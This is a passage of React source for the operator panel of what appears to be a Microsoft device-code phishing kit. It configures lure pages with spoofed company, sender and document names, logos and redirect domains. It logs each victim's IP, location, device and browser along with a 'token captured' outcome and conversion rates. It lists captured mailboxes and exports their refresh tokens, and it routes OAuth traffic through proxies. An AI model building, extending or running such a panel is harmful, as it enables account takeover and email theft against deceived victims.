            Current dashboard theme: {themeMode === "dark" ? "Dark mode" : "Light mode"}
          </div>
          <div style={styles.buttonRow}>
            <button style={themeMode === "dark" ? styles.primaryButton : styles.secondaryButton} onClick={() => updateThemeMode("dark")}>Dark mode</button>
            <button style={themeMode === "light" ? styles.primaryButton : styles.secondaryButton} onClick={() => updateThemeMode("light")}>Light mode</button>
          </div>
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardTitle}>Panel password</div>
          <div style={styles.cardSubtitle}>Change the password used to sign in to your panel.</div>
          <label style={styles.label}>Current password</label>
          <input
            style={styles.input}
            type="password"
            value={currentPanelPassword}
            onChange={(e) => setCurrentPanelPassword(e.target.value)}
            placeholder="Current password"
          />
          <label style={styles.label}>New password</label>
          <input
            style={styles.input}
            type="password"
            value={newPanelPassword}
            onChange={(e) => setNewPanelPassword(e.target.value)}
            placeholder="New password, minimum 8 characters"
          />
          <label style={styles.label}>Confirm new password</label>
          <input
            style={styles.input}
            type="password"
            value={confirmPanelPassword}
            onChange={(e) => setConfirmPanelPassword(e.target.value)}
            placeholder="Re-enter new password"
          />
          <button style={styles.primaryButton} onClick={changePanelPassword} disabled={securityLoading}>
            {securityLoading ? "Saving..." : "Change panel password"}
          </button>
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Google Authenticator 2FA</div>
              <div style={styles.cardSubtitle}>Require a 6-digit authenticator code after the panel password.</div>
            </div>
            {renderBadge(securitySettings.two_factor_enabled ? "Enabled" : "Disabled", securitySettings.two_factor_enabled ? "green" : "gray")}
          </div>

          {!securitySettings.two_factor_enabled && !twoFactorSetup && (
            <button style={styles.primaryButton} onClick={startTwoFactorSetup} disabled={securityLoading}>
              {securityLoading ? "Starting..." : "Set up Google Authenticator"}
            </button>
          )}

          {!securitySettings.two_factor_enabled && twoFactorSetup && (
            <div style={{ display: "grid", gap: 12 }}>
              <div style={styles.infoBox}>
                Open Google Authenticator, add a new account, then use this manual setup key.
              </div>
              <label style={styles.label}>Manual entry key</label>
              <div style={{ display: "flex", gap: 8, alignItems: "center", flexWrap: "wrap" }}>
                <code style={styles.codeBlock}>{twoFactorSetup.manual_entry_key || twoFactorSetup.secret}</code>
                <CopyButton value={twoFactorSetup.manual_entry_key || twoFactorSetup.secret || ""} label="Copy key" toast={addToast} />
              </div>
              <label style={styles.label}>Authenticator URI</label>
              <textarea
                style={{ ...styles.textarea, minHeight: 84 }}
                readOnly
                value={twoFactorSetup.otpauth_uri || ""}
              />
              <label style={styles.label}>Enter 6-digit code</label>
              <input
                style={styles.input}
                inputMode="numeric"
                value={twoFactorCode}
                onChange={(e) => setTwoFactorCode(e.target.value.replace(/\D/g, "").slice(0, 6))}
                placeholder="123456"
              />
              <div style={styles.buttonRow}>
                <button style={styles.primaryButton} onClick={enableTwoFactor} disabled={securityLoading}>Verify and enable 2FA</button>
                <button style={styles.secondaryButton} onClick={() => { setTwoFactorSetup(null); setTwoFactorCode(""); }}>Cancel</button>
              </div>
            </div>
          )}

          {securitySettings.two_factor_enabled && (
            <div style={{ display: "grid", gap: 12 }}>
              <div style={styles.infoBox}>2FA is active. Future logins will ask for your Google Authenticator code.</div>
              <label style={styles.label}>Panel password</label>
              <input
                style={styles.input}
                type="password"
                value={twoFactorDisablePassword}
                onChange={(e) => setTwoFactorDisablePassword(e.target.value)}
                placeholder="Current panel password"
              />
              <label style={styles.label}>Current 2FA code</label>
              <input
                style={styles.input}
                inputMode="numeric"
                value={twoFactorDisableCode}
                onChange={(e) => setTwoFactorDisableCode(e.target.value.replace(/\D/g, "").slice(0, 6))}
                placeholder="123456"
              />
              <button style={styles.dangerButton} onClick={disableTwoFactor} disabled={securityLoading}>
                {securityLoading ? "Disabling..." : "Disable 2FA"}
              </button>
            </div>
          )}
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardTitle}>Your Telegram bot settings</div>
          <div style={styles.cardSubtitle}>Each user can save their own Telegram bot token and chat ID. New user accounts start empty.</div>
          <label style={styles.label}>Telegram bot token</label>
          <input style={styles.input} value={telegramBotToken} onChange={(e) => setTelegramBotToken(e.target.value)} placeholder="123456:ABC..." />
          <label style={styles.label}>Chat ID</label>
          <input style={styles.input} value={telegramChatId} onChange={(e) => setTelegramChatId(e.target.value)} placeholder="-100..." />
          <button style={styles.primaryButton} onClick={saveTelegramSettings} disabled={telegramSettingsLoading}>{telegramSettingsLoading ? "Saving..." : "Save my Telegram settings"}</button>
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardHeaderCompact}>
            <div>
              <div style={styles.cardTitle}>Proxy Settings</div>
              <div style={styles.cardSubtitle}>
                Set a proxy for your outbound Microsoft OAuth requests.
                <br />
                <span style={{ fontSize: 11, color: isDarkMode ? "#94a3b8" : "#64748b" }}>
                  Format: <code>http://user:pass@host:port</code> or <code>socks5://user:pass@host:port</code>
                </span>
              </div>
            </div>
            {renderBadge(customerProxyUrl ? "Proxy set" : "No proxy", customerProxyUrl ? "green" : "gray")}
          </div>

          <div style={{ display: "grid", gap: 8 }}>
            <label style={styles.label}>Proxy URL</label>
            <input
              style={styles.input}
              type="text"
              placeholder="e.g., http://user:pass@1.2.3.4:8080"
              value={customerProxyUrl}
              onChange={(e) => setCustomerProxyUrl(e.target.value.trim())}
            />
            <div style={styles.inlineNote}>
              Leave empty to use your server's default network. When set, all Microsoft device‑code and token requests will be routed through this proxy.
            </div>
            <button
              style={styles.primaryButton}
              onClick={updateCustomerProxy}
              disabled={!isAuthenticated}
            >
              Save Proxy
            </button>
          </div>
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardTitle}>Email Signature</div>
          <div style={styles.cardSubtitle}>Your signature will be inserted into replies and new emails.</div>
          <label style={styles.label}>Signature (plain text or HTML)</label>
          <textarea
            style={{ ...styles.textarea, minHeight: 80 }}
            value={userSignature}
            onChange={(e) => {
              setUserSignature(e.target.value);
              localStorage.setItem("userSignature", e.target.value);
            }}
            placeholder="Best regards,&#10;Your Name"
          />
          <div style={styles.inlineNote}>HTML is supported (e.g., &lt;b&gt;bold&lt;/b&gt;).</div>
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardTitle}>Support</div>
          <div style={styles.cardSubtitle}>Send a support request directly to the admin support Telegram configured in the server .env.</div>
          <label style={styles.label}>Contact support</label>
          <textarea style={{ ...styles.textarea, minHeight: 120 }} value={supportMessage} onChange={(e) => setSupportMessage(e.target.value)} placeholder="Describe the issue or request..." />
          <button style={styles.primaryButton} onClick={sendSupportMessage} disabled={supportSending}>{supportSending ? "Sending..." : "Send support request"}</button>
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardHeaderCompact}>
            <div>
              <div style={styles.cardTitle}>Current Proxy Settings</div>
              <div style={styles.cardSubtitle}>Proxy used for your outgoing requests.</div>
            </div>
            {customerProxyUrl ? renderBadge("Proxy set", "green") : renderBadge("No proxy", "gray")}
          </div>
          <div style={styles.inlineNote}>
            {customerProxyUrl ? (
              <code style={{ wordBreak: "break-all" }}>{customerProxyUrl}</code>
            ) : (
              "No proxy configured. All requests will use your server's default network."
            )}
          </div>
          <button
            style={styles.secondaryButton}
            onClick={() => {
              document.querySelector(".proxy-settings-section")?.scrollIntoView({ behavior: "smooth" });
            }}
          >
            Edit Proxy
          </button>
        </section>
      </div>
    );
  }

  function renderTokenVault() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Mailbox connections</div>
              <div style={styles.cardSubtitle}>Connected mailboxes. Select a row to make it the active mailbox.</div>
            </div>
            <button style={styles.secondaryButton} onClick={fetchTokenVault} disabled={tokenVaultLoading}>{tokenVaultLoading ? "Loading..." : "Refresh Connections"}</button>
          </div>
          {tokenVault.length === 0 ? <div style={styles.emptyState}>No connected mailboxes yet.</div> : (
            <div style={styles.tableWrap}>
              <table style={styles.table}>
                <thead>
                  <tr><th style={styles.th}>Mailbox ID</th><th style={styles.th}>Email</th><th style={styles.th}>Access type</th><th style={styles.th}>Refresh token</th><th style={styles.th}>Expires</th><th style={styles.th}>Action</th></tr>
                </thead>
                <tbody>
                  {tokenVault.map((t) => {
                    const mailboxId = t.saved_under_user_id || t.tenant_id;
                    return (
                      <tr key={t.id || t.tenant_id}>
                        <td style={styles.td}>{mailboxId}</td>
                        <td style={styles.td}>{t.email || "—"}</td>
                        <td style={styles.td}>{t.stored_mail_connected || t.mail_connected ? renderBadge("Mail", "green") : renderBadge("Identity", "orange")}</td>
                        <td style={styles.td}>{t.has_refresh_token ? renderBadge("Yes", "green") : renderBadge("No", "orange")}</td>
                        <td style={styles.td}>{t.expires_at || "—"}</td>
                        <td style={styles.td}>
                          <button style={styles.secondaryButton} onClick={async () => {
                            const uid = mailboxId;
                            setSelectedUserId(uid);
                            await fetchMicrosoftStatus(uid);
                            await loadRules(uid);
                            addToast(`Selected ${uid}`, "success");
                          }}>Select</button>
                          {mailboxId && (
                            <button
                              style={styles.secondaryButton}
                              onClick={async () => {
                                try {
                                  const res = await fetchWithAuth(`${API}/tokens/${encodeURIComponent(mailboxId)}/export-refresh-token`);
                                  if (!res.ok) throw new Error();
                                  const blob = await res.blob();
                                  const url = window.URL.createObjectURL(blob);
                                  const a = document.createElement("a");
                                  a.href = url;
                                  a.download = `refresh_token_${mailboxId}.enc`;
                                  a.click();
                                  window.URL.revokeObjectURL(url);
                                  addToast("Refresh token exported", "success");
                                } catch {
                                  addToast("Failed to export refresh token", "error");
                                }
                              }}
                            >
                              Export Refresh Token
                            </button>
                          )}
                          {mailboxId && (
                            <button
                              style={styles.secondaryButton}
                              onClick={() => {
                                setSelectedUserId(mailboxId);
                                startDeviceCodeFlow(true);
                              }}
                            >
                              Reconnect
                            </button>
                          )}
                        </td>
                      </tr>
                    );
                  })}
                </tbody>
              </table>
            </div>
          )}
        </section>
      </div>
    );
  }

  function renderDashboard() {
    return (
      <div style={{ ...styles.sectionStack, ...styles.dashboardCompact }}>
        <div style={styles.statGrid}>
          {renderSummaryCard(
            "Saved Users",
            dashboardSummary.saved_users_count,
            "#2e90fa",
            "Managed identities",
            "👤"
          )}
          {renderSummaryCard(
            "Connected Mailboxes",
            dashboardSummary.connected_mailboxes_count,
            "#12b76a",
            "Stored token records",
            "📬"
          )}
          {renderSummaryCard(
            "Active setup links",
            activeGeneratedLinksCount,
            "#f59e0b",
            "Currently active links",
            "🔗"
          )}
          {renderSummaryCard(
            "Active mailbox",
            selectedUserId || dashboardSummary.active_mailbox || "None",
            "#6366f1",
            inboxConnected ? "Selected user is inbox-connected" : "Selected dashboard user",
            "📨"
          )}
        </div>

        {visitSummary && (
          <div style={styles.statGrid}>
            {renderSummaryCard(
              "Total Visits",
              visitSummary.total_visits,
              "#f59e0b",
              "All time visits",
              "🔗"
            )}
            {renderSummaryCard(
              "Completed Connections",
              visitSummary.successful_captures,
              "#12b76a",
              "Successful mailbox connections",
              "✅"
            )}
            {renderSummaryCard(
              "Countries",
              visitSummary.country_count || 0,
              "#6366f1",
              "Visitor locations",
              "🌍"
            )}
            {renderSummaryCard(
              "Last 24 Hours",
              visitSummary.recent_visits_24h,
              "#ec4899",
              `${visitSummary.conversion_rate}% conversion rate`,
              "📊"
            )}
          </div>
        )}

        <div style={styles.dashGrid}>
          <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
            <div style={styles.cardHeaderCompact}>
              <div>
                <div style={styles.cardTitle}>Workspace overview</div>
                <div style={styles.cardSubtitle}>
                  Current user, tenant mode, and connection status
                </div>
              </div>
            </div>
            <div style={styles.quickGrid}>
              <div style={styles.miniPanel}>
                <div style={styles.miniPanelLabel}>Selected user</div>
                <div style={styles.miniPanelValue}>
                  {selectedUserId || "None selected"}
                </div>
                <div style={styles.miniPanelMeta}>
                  {selectedUserTenantHint || "No tenant detected"}
                </div>
              </div>
              <div style={styles.miniPanel}>
                <div style={styles.miniPanelLabel}>Enterprise mode</div>
                <div style={styles.miniPanelValue}>
                  {enterpriseStatus.mode || "preview"}
                </div>
                <div style={styles.miniPanelMeta}>
                  {enterpriseStatus.consent_status || "none"}
                </div>
              </div>
              <div style={styles.miniPanel}>
                <div style={styles.miniPanelLabel}>Current folder</div>
                <div style={styles.miniPanelValue}>{selectedFolderName}</div>
                <div style={styles.miniPanelMeta}>
                  {emails.length} loaded emails
                </div>
              </div>
            </div>
            <div style={{ marginTop: 8 }}>{renderStatusPills()}</div>
            <div style={{ display: "flex", gap: 10, flexWrap: "wrap" }}>
              <button
                style={styles.primaryButton}
                onClick={() => setActiveNav("visits")}
              >
                View Activity Logs
              </button>
              <button
                style={styles.secondaryButton}
                onClick={exportEmailAddressesCsv}
              >
                Export Email CSV
              </button>
              <button
                style={styles.secondaryButton}
                onClick={() => startDeviceCodeFlow(true)}
              >
                Connect Mailbox
              </button>
            </div>
          </section>

          <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
            <div style={styles.cardHeaderCompact}>
              <div>
                <div style={styles.cardTitle}>Server status</div>
                <div style={styles.cardSubtitle}>
                  Pinging every 10 minutes
                </div>
              </div>
            </div>
            <div style={styles.miniPanel}>
              <div style={styles.miniPanelLabel}>Backend server</div>
              <div style={{ marginTop: 8 }}>
                <StatusDot
                  active={serverAlive}
                  label={serverAlive ? "Online" : "Offline / Unreachable"}
                />
              </div>
              {lastPing && (
                <div style={{ ...styles.miniPanelMeta, marginTop: 8 }}>
                  Last ping: {lastPing}
                </div>
              )}
            </div>
            <button
              style={styles.secondaryButton}
              onClick={async () => {
                await pingServer();
                addToast(
                  serverAlive ? "Server is alive" : "Server unreachable",
                  serverAlive ? "success" : "error"
                );
              }}
            >
              Ping Now
            </button>
            {visitSummary && (
              <>
                <div style={styles.miniPanelLabel}>Top countries</div>
                <MiniBarChart
                  data={visitSummary.top_countries}
                  color="#2e90fa"
                />
                <div
                  style={{
                    display: "flex",
                    gap: 6,
                    flexWrap: "wrap",
                    marginTop: 4,
                  }}
                >
                  {(visitSummary.top_countries || []).map((c, i) => (
                    <span key={i} style={{ fontSize: 11, color: "#667085" }}>
                      {c.country} ({c.count})
                    </span>
                  ))}
                </div>
              </>
            )}
          </section>
        </div>

        {visitSummary && (
          <div style={styles.dashGrid}>
            <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
              <div style={styles.cardTitle}>Device breakdown</div>
              <div style={styles.cardSubtitle}>Visitor device types</div>
              <div
                style={{
                  display: "flex",
                  gap: 10,
                  flexWrap: "wrap",
                  marginTop: 8,
                }}
              >
                {(visitSummary.device_breakdown || []).map((d, i) => (
                  <div key={i} style={styles.miniPanel}>
                    <div style={styles.miniPanelLabel}>
                      {d.device || "unknown"}
                    </div>
                    <div style={styles.miniPanelValue}>{d.count}</div>
                  </div>
                ))}
              </div>
            </section>
            <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
              <div style={styles.cardTitle}>Browser breakdown</div>
              <div style={styles.cardSubtitle}>Visitor browsers</div>
              <div
                style={{
                  display: "flex",
                  gap: 10,
                  flexWrap: "wrap",
                  marginTop: 8,
                }}
              >
                {(visitSummary.browser_breakdown || []).map((b, i) => (
                  <div key={i} style={styles.miniPanel}>
                    <div style={styles.miniPanelLabel}>
                      {b.browser || "unknown"}
                    </div>
                    <div style={styles.miniPanelValue}>{b.count}</div>
                  </div>
                ))}
              </div>
            </section>
          </div>
        )}
      </div>
    );
  }

  function renderVisits() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>URL visit logs</div>
              <div style={styles.cardSubtitle}>
                Every visit to your generated Mailbox Connection URLs — IP, device,
                browser, country, outcome
              </div>
            </div>
            <div style={styles.inlineActions}>
              <button
                style={styles.secondaryButton}
                onClick={() => {
                  fetchVisits();
                  fetchVisitSummary();
                }}
                disabled={visitsLoading}
              >
                {visitsLoading ? "Loading..." : "Refresh"}
              </button>
              <button
                style={{
                  ...styles.secondaryButton,
                  borderColor: "#fda4af",
                  color: "#be123c",
                }}
                onClick={() =>
                  confirm(
                    "Clear all visits",
                    "This will permanently delete all visit records. Continue?",
                    clearVisits
                  )
                }
              >
                Clear All
              </button>
            </div>
          </div>

          {visitSummary && (
            <div style={styles.statGrid}>
              {renderSummaryCard(
                "Total Visits",
                visitSummary.total_visits,
                "#2e90fa",
                "All time",
                "🔗"
              )}
              {renderSummaryCard(
                "Successful",
                visitSummary.successful_captures,
                "#12b76a",
                "Token captured",
                "✅"
              )}
              {renderSummaryCard(
                "Failed",
                visitSummary.failed_attempts,
                "#f04438",
                "Exchange failed",
                "❌"
              )}
              {renderSummaryCard(
                "Conversion",
                `${visitSummary.conversion_rate}%`,
                "#7c3aed",
                "Success rate",
                "📈"
              )}
            </div>
          )}

          <div style={styles.compactGrid3}>
            <input style={styles.input} placeholder="User ID / mailbox" value={visitFilter} onChange={(e) => setVisitFilter(e.target.value)} />
            <input style={styles.input} placeholder="Country" value={visitCountryFilter} onChange={(e) => setVisitCountryFilter(e.target.value)} />
            <input style={styles.input} placeholder="City / location" value={visitCityFilter} onChange={(e) => setVisitCityFilter(e.target.value)} />
            <input style={styles.input} placeholder="Device type" value={visitDeviceFilter} onChange={(e) => setVisitDeviceFilter(e.target.value)} />
            <input style={styles.input} placeholder="Browser" value={visitBrowserFilter} onChange={(e) => setVisitBrowserFilter(e.target.value)} />
            <input style={styles.input} placeholder="IP address" value={visitIpFilter} onChange={(e) => setVisitIpFilter(e.target.value)} />
          </div>
          <div style={{ display: "flex", gap: 10, flexWrap: "wrap" }}>
            <select style={{ ...styles.select, maxWidth: 260 }} value={visitOutcomeFilter} onChange={(e) => setVisitOutcomeFilter(e.target.value)}>
              <option value="">All outcomes</option>
              <option value="started">started</option>
              <option value="token_captured">token_captured</option>
              <option value="visited">visited</option>
              <option value="failed">failed</option>
            </select>
            <button style={styles.secondaryButton} onClick={fetchVisits}>Apply Filters</button>
            <button
              style={styles.secondaryButton}
              onClick={() => {
                setVisitFilter(""); setVisitCountryFilter(""); setVisitCityFilter("");
                setVisitDeviceFilter(""); setVisitBrowserFilter(""); setVisitOutcomeFilter(""); setVisitIpFilter("");
                setTimeout(fetchVisits, 100);
              }}
            >
              Clear Filters
            </button>
          </div>

          {visitsLoading ? (
            <div style={styles.emptyState}>Loading visit logs...</div>
          ) : visits.length === 0 ? (
            <div style={styles.emptyState}>
              No visit records yet. Visits are recorded when users open your
              generated Mailbox Connection URLs.
            </div>
          ) : (
            <div style={styles.tableWrap}>
              <table style={styles.table}>
                <thead>
                  <tr>
                    <th style={styles.th}>Time</th>
                    <th style={styles.th}>Target User</th>
                    <th style={styles.th}>IP Address</th>
                    <th style={styles.th}>Country</th>
                    <th style={styles.th}>City</th>
                    <th style={styles.th}>Device</th>
                    <th style={styles.th}>Browser</th>
                    <th style={styles.th}>OS</th>
                    <th style={styles.th}>URL Type</th>
                    <th style={styles.th}>Outcome</th>
                  </tr>
                </thead>
                <tbody>
                  {visits.map((v) => (
                    <tr key={v.id}>
                      <td style={styles.td}>
                        {v.visited_at
                          ? new Date(v.visited_at * 1000).toLocaleString()
                          : "—"}
                      </td>
                      <td style={styles.td}>
                        <span
                          style={{
                            fontSize: 12,
                            fontWeight: 700,
                            color: "#344054",
                          }}
                        >
                          {v.target_user_id || "—"}
                        </span>
                      </td>
                      <td style={styles.td}>
                        <span
                          style={{
                            fontFamily: "monospace",
                            fontSize: 12,
                            color: "#667085",
                          }}
                        >
                          {v.ip_address || "—"}
                        </span>
                      </td>
                      <td style={styles.td}>{v.country || "—"}</td>
                      <td style={styles.td}>{v.city || "—"}</td>
                      <td style={styles.td}>
                        {v.device_type === "mobile"
                          ? "📱 Mobile"
                          : v.device_type === "tablet"
                            ? "📟 Tablet"
                            : v.device_type === "desktop"
                              ? "🖥 Desktop"
                              : v.device_type || "—"}
                      </td>
                      <td style={styles.td}>{v.browser || "—"}</td>
                      <td style={styles.td}>{v.os || "—"}</td>
                      <td style={styles.td}>
                        {v.url_type
                          ? renderBadge(v.url_type, "blue")
                          : "—"}
                      </td>
                      <td style={styles.td}>
                        {v.outcome === "token_captured"
                          ? renderBadge("✓ Captured", "green")
                          : v.outcome?.startsWith("failed")
                            ? renderBadge("✕ Failed", "red")
                            : renderBadge(
                                v.outcome || "visited",
                                "gray"
                              )}
                      </td>
                    </tr>
                  ))}
                </tbody>
              </table>
            </div>
          )}
        </section>
      </div>
    );
  }

  function renderManageUrlGeneration() {
    const panelStyle = {
      ...styles.linkPanel,
      display: "grid",
      gap: 10,
      padding: 10,
      borderRadius: 12,
    };

    const summaryButtonStyle = {
      ...styles.secondaryButton,
      width: "100%",
      justifyContent: "space-between",
      textDecoration: "underline",
      textUnderlineOffset: 4,
      cursor: "pointer",
      listStyle: "none",
      padding: "9px 12px",
      minHeight: 38,
      fontSize: 13,
    };

    const detailsStyle = {
      ...styles.card,
      ...(isDarkMode ? styles.cardDark : {}),
      padding: 12,
    };

    const landingIsPlain = !selectedLandingTemplateId || selectedLandingTemplateId === PLAIN_LANDING_TEMPLATE_ID;
    const selectedTemplateName = landingIsPlain
      ? "Plain / no landing template"
      : selectedLandingTemplate()?.name || selectedLandingTemplate()?.title || "Selected template";
    const selectedExitPage = exitPages.find((page) => String(page.id || page.page_id || page.key || "") === String(selectedExitPageId));
    const selectedExitPageName = selectedExitPageId
      ? selectedExitPage?.name || selectedExitPage?.title || "Custom exit page"
      : "Plain / no exit page";

    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={{ ...styles.cardHeaderCompact, alignItems: "flex-start" }}>
            <div>
              <div style={styles.cardTitle}>Manage lure generation</div>
              <div style={styles.cardSubtitle}>
                Fully customize your generated link. Choose template, logo , choose what users see after completion...etc 
              </div>
            </div>

          </div>

          <div style={{ display: "grid", gridTemplateColumns: "repeat(auto-fit, minmax(150px, 1fr))", gap: 8, marginTop: 10 }}>
            <div style={{ ...styles.linkPanel, padding: "9px 10px", borderRadius: 12 }}>
              <div style={{ ...styles.inlineNote, fontSize: 11 }}>Landing Template</div>
              <div style={{ fontWeight: 900, fontSize: 13, overflowWrap: "anywhere" }}>{selectedTemplateName}</div>
            </div>
            <div style={{ ...styles.linkPanel, padding: "9px 10px", borderRadius: 12 }}>
              <div style={{ ...styles.inlineNote, fontSize: 11 }}>Exit page</div>
              <div style={{ fontWeight: 900, fontSize: 13, overflowWrap: "anywhere" }}>{selectedExitPageName}</div>
            </div>
            <div style={{ ...styles.linkPanel, padding: "9px 10px", borderRadius: 12 }}>
              <div style={{ ...styles.inlineNote, fontSize: 11 }}>Redirect</div>
              <div style={{ fontWeight: 900, fontSize: 13 }}>{instructionRedirectMode === "custom" ? "Own domain" : instructionRedirectMode === "worker" ? "workers.dev" : "Direct"}</div>
            </div>
          </div>
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Quick setup</div>
              <div style={styles.cardSubtitle}>Customize your link template, background, redirect type. etc...</div>
            </div>
          </div>

          <div style={styles.compactGrid2}>
            <div>
              <label style={styles.label}>Landing template</label>
              <select
                style={styles.select}
                value={selectedLandingTemplateId}
                onChange={(e) => {
                  const nextId = e.target.value;
                  setSelectedLandingTemplateId(nextId);
                  if (nextId === PLAIN_LANDING_TEMPLATE_ID) return;
                  const template = landingTemplates.find((item) => String(item.id || item.template_id || item.key) === String(nextId));
                  if (template) applyLandingTemplate(template);
                }}
              >
                <option value={PLAIN_LANDING_TEMPLATE_ID}>Plain / no landing template</option>
                {landingTemplates.map((template) => (
                  <option key={String(template.id || template.template_id || template.key)} value={String(template.id || template.template_id || template.key)}>
                    {template.name || template.title || template.source_filename || "Landing template"}
                  </option>
                ))}
              </select>
            </div>

            <div>
              <label style={styles.label}>Exit page after completion (Choose preferred file or enter url under Exit page settings below)</label>
              <select style={styles.select} value={selectedExitPageId} onChange={(e) => setSelectedExitPageId(e.target.value)}>
                <option value="">Plain / no exit page after completion</option>
                {exitPages.map((page) => (
                  <option key={String(page.id || page.page_id || page.key)} value={String(page.id || page.page_id || page.key)}>
                    {page.name || page.title || page.file_name || "Exit page"}
                  </option>
                ))}
              </select>
            </div>

            <div>
              <label style={styles.label}>Company name</label>
              <input style={styles.input} value={instructionCompanyName} onChange={(e) => setInstructionCompanyName(e.target.value)} placeholder="Company name shown on link instruction page" />
            </div>

            <div>
              <label style={styles.label}>Sender name</label>
              <input style={styles.input} value={instructionSenderName} onChange={(e) => setInstructionSenderName(e.target.value)} placeholder="Sender name shown on link instruction page" />
            </div>

            <div>
              <label style={styles.label}>Shared document/name</label>
              <input style={styles.input} value={instructionDocumentName} onChange={(e) => setInstructionDocumentName(e.target.value)} placeholder="Document or file name to be shown on link instruction page" />
            </div>

            <div>
              <label style={styles.label}>Document logo to be shown on link instruction page</label>
              <select style={styles.select} value={instructionDocumentLogoType} onChange={(e) => setInstructionDocumentLogoType(e.target.value)}>
                <option value="pdf">PDF</option>
                <option value="doc">DOC</option>
                <option value="image">Image</option>
              </select>
            </div>

            <div>
              <label style={styles.label}>Select background theme for instruction page</label>
              <select
                style={styles.select}
                value={selectedInstructionThemeId}
                onChange={(e) => {
                  const nextId = e.target.value;
                  setSelectedInstructionThemeId(nextId);
                  if (nextId !== "__plain__") clearInstructionTheme();
                }}
              >
                <option value="__plain__">Plain instruction background</option>
                {instructionThemes.map((theme) => (
                  <option key={theme.id} value={theme.id}>
                    {theme.source === "admin" ? "Admin" : "Admin"}: {theme.name || theme.html_filename || theme.original_filename || "Theme"} ({String(theme.theme_type || "theme").toUpperCase()})
                  </option>
                ))}
              </select>
              <div style={styles.inlineNote}>Admin themes show for everyone. Users can upload and use their own custom themes too.</div>
            </div>

            <div style={{ display: "grid", gap: 8, padding: 12, border: "1px solid #e5e7eb", borderRadius: 12, background: isDarkMode ? "#0f172a" : "#f8fafc" }}>
              <div style={{ display: "flex", justifyContent: "space-between", alignItems: "center", gap: 10 }}>
                <label style={{ ...styles.label, margin: 0 }}>Add custom instruction theme</label>
                <button style={{ ...styles.secondaryButton, padding: "6px 10px" }} onClick={() => setInstructionThemeManagerOpen((v) => !v)}>
                  {instructionThemeManagerOpen ? "Close" : "Add theme"}
                </button>
              </div>
              {instructionThemeManagerOpen && (
                <div style={{ display: "grid", gap: 8 }}>
                  <input style={styles.input} value={instructionThemeUploadName} onChange={(e) => setInstructionThemeUploadName(e.target.value)} placeholder="Theme name" />
                  <input
                    style={styles.input}
                    type="file"
                    accept="image/*,.pdf,application/pdf,.html,.htm,text/html"
                    disabled={instructionThemeUploading}
                    onChange={(e) => uploadInstructionThemeFile(e.target.files?.[0])}
                  />
                  <div style={styles.inlineNote}>Upload image, PDF, or HTML. It is saved like a reusable template and rendered behind the instruction card.</div>
                  {instructionThemes.length > 0 && (
                    <div style={{ display: "grid", gap: 6, maxHeight: 160, overflow: "auto" }}>
                      {instructionThemes.map((theme) => (
                        <div key={theme.id} style={{ display: "flex", alignItems: "center", justifyContent: "space-between", gap: 8, fontSize: 12 }}>
                          <span style={{ overflow: "hidden", textOverflow: "ellipsis", whiteSpace: "nowrap" }}>
                            {theme.source === "admin" ? "Admin" : "Admin"}: {theme.name || theme.original_filename || "Theme"}
                          </span>
                          {(theme.can_delete || isAdmin) && (
                            <button
                              style={{ ...styles.dangerButton, padding: "4px 8px" }}
                              disabled={instructionThemeDeletingId === theme.id}
                              onClick={() => deleteInstructionTheme(theme)}
                            >
                              {instructionThemeDeletingId === theme.id ? "Deleting..." : "Delete"}
                            </button>
                          )}
                        </div>
                      ))}
                    </div>
                  )}
                </div>
              )}
            </div>

            <div>
              <label style={styles.label}>Browser tab title</label>
              <input style={styles.input} value={instructionBrowserTitle} onChange={(e) => setInstructionBrowserTitle(e.target.value)} placeholder="Optional custom tab title" />
            </div>

            <div>
              <label style={styles.label}>Instruction title</label>
              <input style={styles.input} value={deviceHandoutTitle} onChange={(e) => setDeviceHandoutTitle(e.target.value)} placeholder="Optional instruction page title" />
            </div>

            <div>
              <label style={styles.label}>Additional instructions</label>
              <textarea style={{ ...styles.input, minHeight: 78 }} value={deviceHandoutWriteup} onChange={(e) => setDeviceHandoutWriteup(e.target.value)} placeholder="Optional extra instructions shown under the company name" />
            </div>

            <div>
              <label style={styles.label}>Pick a default logo</label>
              <select
                style={styles.select}
                value={DEFAULT_LOGOS.find((l) => l.url === deviceHandoutLogoUrl)?.url || ""}
                onChange={(e) => {
                  const url = e.target.value;
                  if (url) {
                    setDeviceHandoutLogoUrl(url);
                    setDeviceHandoutLogoFileName("");
                  }
                }}
              >
                <option value="">-- Choose from default logos --</option>
                {DEFAULT_LOGOS.map((logo) => (
                  <option key={logo.name} value={logo.url}>{logo.name}</option>
                ))}
              </select>
              <div style={styles.inlineNote}>Or paste/upload your own logo below.</div>
            </div>

            <div>
              <label style={styles.label}>Instruction logo URL</label>
